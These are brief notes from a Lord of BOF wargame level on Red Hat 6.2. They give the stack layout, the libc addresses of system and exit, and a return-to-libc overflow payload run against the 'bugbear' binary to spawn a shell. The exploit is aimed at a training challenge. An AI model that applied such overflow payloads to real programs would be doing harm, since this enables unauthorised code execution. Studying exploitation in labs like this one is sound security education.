LOB Redhat 6.2 - darkknight

darkknight - RTL1

Stack : i[4] + buffer[40] + sfp[4] + ret[4]

system : 0x40058ae0
exit : 0x400391e0

return address : 0x40058ae0

Payload : ./bugbear `python -c 'print "A"*44 + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`

binsh.c : 

Using RTL